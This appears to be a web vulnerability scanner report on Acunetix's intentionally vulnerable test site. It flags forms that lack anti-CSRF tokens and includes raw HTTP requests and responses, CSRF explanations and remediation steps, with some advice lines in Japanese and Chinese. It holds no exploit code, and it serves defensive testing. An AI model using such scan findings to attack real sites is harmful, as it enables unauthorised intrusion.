          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="about.aspx" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        4. GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" "btnSend" ].

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13707
          
          
          Response body (13707 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9zWSYY5iwxqgBHXlBfPJ/1TT/YMA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a>
          						<DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        5. GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" "btnSend" ].

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
